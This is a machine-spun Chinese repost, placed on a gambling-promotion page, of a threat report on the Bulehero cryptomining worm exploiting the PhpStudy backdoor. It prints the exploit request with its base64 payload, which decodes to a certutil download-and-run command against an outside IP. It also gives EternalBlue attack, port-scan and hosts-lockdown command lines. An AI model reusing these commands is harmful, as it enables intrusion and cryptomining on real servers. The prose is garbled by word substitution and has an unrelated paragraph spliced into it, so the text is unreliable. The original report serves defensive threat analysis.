要挟快报|Bulehero挖矿蠕虫升级,PhpStudy后门破绽到场武器库 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

要挟快报|Bulehero挖矿蠕虫升级,PhpStudy后门破绽到场武器库

申博_安全预警 申博 26次浏览 未收录 0个评论

菲律宾Sunbet

菲律宾Sunbet以其优越的游戏体验感和娱乐新颖感,拥有了大量的客户群体和优质的用户反馈。在这里,客户就是上帝,客户的要求就是菲律宾Sunbet的追求,客户的意见就是菲律宾Sunbet宝贵的钻石,为用户量身定制个性化的娱乐方式,让用户体验最美妙、最有价值的娱乐方式。正是菲律宾Sunbet的理念,才让其在同类平台中脱颖而出,成为亚洲最具公信力的网上娱乐平台。

,

概述

近日,阿里云平安团队监控到Bulehero挖矿蠕虫举行了版本升级,蠕虫升级后最先应用最新涌现的PHPStudy后门破绽作为新的进击体式格局对Windows主机举行进击,进击胜利后会下载门罗币挖矿顺序举行取利。该挖矿顺序会放肆抢占效劳器CPU资本举行门罗币的发掘,形成效劳器卡顿,严重影响一般营业运转,以至形成营业终端。关于该蠕虫最早暴光于2018年7月,蠕虫自涌现后频仍更新,连续到场多达数十种的的进击体式格局,可以估计该黑客团伙将会不停的寻觅新的进击体式格局来植入其歹意顺序。发起用户实时排查本身主机是不是存在平安破绽,并关注阿里云平安团队的相干文章。

背景引见

Bulehero

Bulehero挖矿蠕虫最早涌现于2018年终,首次暴光于2018年8月,因最早运用bulehero.in域名被定名为Bulehero。该蠕虫专注于进击Windows效劳器,经由过程植入歹意挖矿软件举行取利。它运用多种庞杂的进击体式格局举行流传,自涌现后更新频仍,不停的将新的进击体式格局到场本身的武器库。

PhpStudy后门破绽

PhpStudy是国内的一款免费的PHP调试环境的顺序集成包,在国内有着近百万的PHP言语学习者和开发者用户。在2019年9月20日,网上爆出PhpStudy存在“后门”:黑客早在2016年就编写了“后门”文件,并不法侵入了PhpStudy的官网,篡改了软件安装包植入“后门”。该“后门”具有长途掌握计算机的功用,可以长途掌握下载运转剧本完成用户个人信息网络。据报道黑客应用该破绽共不法掌握计算机67万余台,不法猎取大批账号密码类、谈天数据类、装备码类等数据10万余组。该“后门”除了会形成挖矿和信息泄漏,另有可以被讹诈病毒应用,效劳器症结数据被讹诈病毒加密后将没法找回,给被害者形成大批的数据、经济损失。

蠕虫剖析

进击行动剖析

进击者会向被进击的效劳器发送一个应用破绽的HTTP GET请求,歹意代码存在于请求头的Accept-Charset字段,字段内容经由base64编码。解码后可以发明这是一段windows敕令:应用certutil.exe东西下载download.exe

GET /index.php HTTP/1.1Connection: Keep-Alive
Accept: */*
Accept-Charset: c3lzdGVtKCdjZXJ0dXRpbC5leGUgLXVybGNhY2hlIC1zcGxpdCAtZiBodHRwOi8vNjAuMTY0LjI1MC4xNzA6Mzg4OC9kb3dubG9hZC5leGUgJVN5c3RlbVJvb3QlL1RlbXAvZ2Jubm5teXdrdmd3aGZxMTM5OTAuZXhlICYgJVN5c3RlbVJvb3QlL1RlbXAvZ2Jubm5teXdrdmd3aGZxMTM5OTAuZXhlJyk7ZWNobyBtZDUoJ3BocHN0dWR5Jyk7
Accept-Encoding: gzip,deflate
Accept-Language: zh-cn
Referer: http://xxx:80/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: xxx

解码后内容:

system('certutil.exe -urlcache -split -f http://60.164.250.170:3888/download.exe %SystemRoot%/Temp/gbnnnmywkvgwhfq13990.exe & %SystemRoot%/Temp/gbnnnmywkvgwhfq13990.exe');echo md5('phpstudy');

被感染主机行动

要挟快报|Bulehero挖矿蠕虫升级,PhpStudy后门破绽到场武器库

利用 Ocular 工具挖掘 C & C++ 程序内存分配相关漏洞

0x01  前言 C / C++主要使用 malloc,calloc,zalloc,realloc和专门版本kmalloc来进行内存分配。例如,malloc具有void *malloc(size_t size) 签名,可以从堆中申请任何数量的字节,该函数会返回一个指针。然后使用释放内存函数free()。即使在2019年,这些函数仍然是黑客进行漏洞利用的入口点。例如,最近在WhatsApp中出现的UAF漏洞,我将在后续文章中讨论。

如上图是歹意文件在主机中的行动流程图,download.exe是Bulehero的下载器,会下载名为ScarupnpLogon.exe
的文件。该文件会开释多个打包的歹意文件,这些歹意文件可分为三个模块:挖矿模块、扫描模块、进击模块。

· 挖矿模块:该模块举行门罗币的挖矿,Bulehero在该版本中并未运用大众矿池举行挖矿,改用自建的矿池代办举行挖矿使命分发,因而可以防备暴露钱包地点,防备平安研究人员的跟踪。

· 扫描模块:该模块会扫描互联网的特定开放端口,并将扫描效果写入到名为Result.txt的文件中

C:\Windows\gstmlepnk\ntkpmzgif\uktkebigm.exe -iL C:\Windows\gstmlepnk\ntkpmzgif\ip.txt -oJ C:\Windows\gstmlepnk\ntkpmzgif\Result.txt --open --rate 4096 -p 445

· 进击模块:
该模块集成多种破绽应用东西,读取扫描效果并进击其他主机,以下历程是其运用永久之蓝破绽模块举行进击。

C:\Windows\gstmlepnk\UnattendGC\specials\svschost.exe --InConfig C:\Windows\gstmlepnk\UnattendGC\specials\svschost.xml --TargetIp 106.14.149.128 --TargetPort 445 --DllPayload C:\Windows\gstmlepnk\UnattendGC\AppCapture64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll

我们对照Bulehero升级前的样本行动,发明它在主机中的行动并未有较大转变,依然是经由过程download.exe下载器下载文件包,并开释三个功用模块。然则它为了隐蔽本身转变了歹意文件定名体式格局,升级前经由过程殽杂的体系文件名举行假装,升级后悉数为随机的文件途径和文件名。虽然随机文件名相关于殽杂体系文件名更轻易暴露本身,但这类战略的优点是可以防备被其他挖矿病毒经由过程历程指纹消灭,在资本合作中占有上风。

· 其他行动
运用netsh ipsec平安东西,阻断存在破绽的效劳端口,防备其他合作者进入。

netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
netsh ipsec static add filteraction name=BastardsList action=block

修正主机host防备其他合作者挟制域名。

cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM

时候线

我们依据Bulehero的歹意文件编译时候和文件上传时候,可以肯定Bulehero的升级时候是在10月6号的23点,间隔PhpStudy后门破绽应用体式格局暴光只要2周。假如企业存在破绽,去除中心的国庆长假,真正留给企业的修复之间只要几天。从歹意文件下载次数来看,截止到发稿前已经有1万5千次的下载,可见该蠕虫流传速度极快,形成的破坏性很大。

要挟快报|Bulehero挖矿蠕虫升级,PhpStudy后门破绽到场武器库

要挟快报|Bulehero挖矿蠕虫升级,PhpStudy后门破绽到场武器库

其他进击体式格局

除了此次更新增添的PhpStudy后门破绽,Bulehero还运用多种进击体式格局,以下是其他已知的进击体式格局。

平安发起

企业须要对触及的破绽实时修复,不然轻易成为挖矿木马的受害者。

2、发起运用阿里云平安的下一代云防火墙产物,其阻断歹意外联、可以设置智能战略的功用,可以有用辅佐防备入侵。哪怕进击者在主机上的隐蔽手腕再高妙,下载、挖矿、反弹shell这些操纵,都须要举行歹意外联;云防火墙的阻拦将完全阻断进击链。另外,用户还可以经由过程自定义战略,直接屏障歹意网站,到达阻断入侵的目标。另外,云防火墙独占的假造补丁功用,可以辅佐客户更天真、更“无感”地阻断进击。

3、关于有更高定制化请求的用户,可以斟酌运用阿里云平安管家效劳。购置效劳后将有经验丰富的平安专家供应咨询效劳,定制合适您的计划,辅佐加固体系,防备入侵。入侵事宜发生后,也可参与直接辅佐入侵后的清算、事宜溯源等,合适有较高平安需求的用户,或未雇佣平安工程师,但愿望保证体系平安的企业。

原文地点: https://www.4hou.com/vulnerable/21296.html


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明要挟快报|Bulehero挖矿蠕虫升级,PhpStudy后门破绽到场武器库
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址